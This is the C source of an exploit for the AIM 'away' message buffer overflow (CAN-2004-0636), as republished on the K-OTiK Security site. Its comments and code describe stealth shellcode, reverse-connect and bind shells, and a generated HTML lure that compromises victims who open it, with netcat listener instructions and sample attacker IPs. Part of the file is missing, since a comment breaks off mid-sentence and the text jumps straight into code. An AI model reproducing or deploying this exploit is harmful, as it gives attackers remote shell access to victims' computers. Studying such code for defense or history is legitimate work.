AOL Instant Messenger AIM "Away" Message Remote Exploit


/* CAN-2004-0636 */

/*
 * AIM Away Message Buffer Overflow Exploit
 *   Exploit by John Bissell A.K.A. HighT1mes
 *
 * Exploit: 
 * ========
 *   drizzit.c
 *
 * Vulnerable Software:
 * ====================
 *    - AIM 5.5.3588
 *    - AIM 5.5.3590 Beta
 *    - AIM 5.5.3591
 *    - AIM 5.5.3595
 *    and a couple of other versions...
 *
 * If you want to try other return addresses for other versions of
 * AIM then edit the return address.. But the current one embedded 
 * will work for sure with all the AIM versions listed above.
 *
 * I used some of the metasploit shellcode for this exploit with some
 * modifications to get this into stealth mode so it is harder to 
 * detect the attack. Since I'm using metasploit shellcode that means this
 * exploit can be used on any NT type OS, like win2k, winnt, winxp across
 * any service pack.. I don't know about SP2 though I haven't tested
 * it yet.
 *
 * On a side note I purposely did not include the download+exec shellcode
 * even though I have it because I'm sick and tired of these little
 * spam/adware bitches messing people's computers up for profit.. You can
 * still download/upload through the shell to the victim. It just 
 * isn't automated like download+exec would be.
 *
 * In my opinion the reverse connect (-r option) is the most dangerous
 * because you can encode your ip address and pick a port, and then 
 * when the victim visits the evil web page or email whatever.. then the
 * attack will automatically open his AIM even if it's not already open and
 * connect to you and then terminate the AIM process to be stealth so
 * the victim doesn't know what hit them.. As I remind people in the
 * exploit usage you need to remember to use netcat to listen on a 
 * port you picked for the exploit to connect to...
 *
 * One reason I decided to include the generation of html code for 
 * this exploit is I noticed almost no puts small limits on the 
 * \n");
                fprintf(EXPLOIT_FP, "\n");
                fprintf(EXPLOIT_FP, "\n");

                fclose(EXPLOIT_FP);

                /* I'm too lazy to make a macro for this banner :P */
                printf(" +-------------------------------------------------+\n");
                printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
                printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
                printf(" +-------------------------------------------------+\n\n");

                printf(" Exploit created!\n\n");

                printf(" Remember if you use the -r option to have netcat listening\n");
                printf(" on the port you are using for the attack so the victim will\n");
                printf(" be able to connect to you when exploited...\n\n");
                printf(" Example:\n");
                printf("\tnc.exe -l -p %d", port);
        }

        return(EXIT_SUCCESS);
}

void print_usage(char *prog_name)
{
        printf(" +-------------------------------------------------+\n");
        printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
        printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
        printf(" +-------------------------------------------------+\n\n");
        printf(" Exploit Usage:\n");
        printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);
        printf(" Parameters:\n");
        printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\t"
               "and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or"
               " -b then a bind\n\t\t\t\t attack will be generated.\n\n");
        printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t"
               "used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind"
               " then  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode"
               " is reverse connect  then the port you\n\t\t\t\t specify will be the one you want"
               " to listen\n\t\t\t\t on so the victim can  connect to you\n\t\t\t\t right away.\n\n");
        printf("\t-o or -e outfile\t\t Here you specify the output method...\n\t\t\t\t If"
               " you would like output go straight to\n\t\t\t\t standard output then specify the"
               " -o option\n\t\t\t\t otherwise give the path of where you want to\n\t\t\t\t create"
               " the exploit file which is basically\n\t\t\t\t a simple html file. The -o option"
               " is useful if\n\t\t\t\t you want to test the exploit url in\n\t\t\t\t different"
               " ways.\n\n");
        printf(" Examples:\n");
        printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name);
        printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
        printf("\t%s -b -o\n", prog_name);
        printf("\t%s -r 68.6.47.62 -o\n\n", prog_name);
        printf(" Remember if you use the -r option to have netcat listening\n");
        printf(" on the port you are using for the attack so the victim will\n");
        printf(" be able to connect to you when exploited...\n\n");
        printf(" Example:\n");
        printf("\tnc.exe -l -p 8888");
        exit(-1);
}

unsigned char xor_data(unsigned char byte)
{
        return(byte ^ 0x92);
}

All rights reserved © 2002-2004 K-OTiK Security. See Legal Notice.
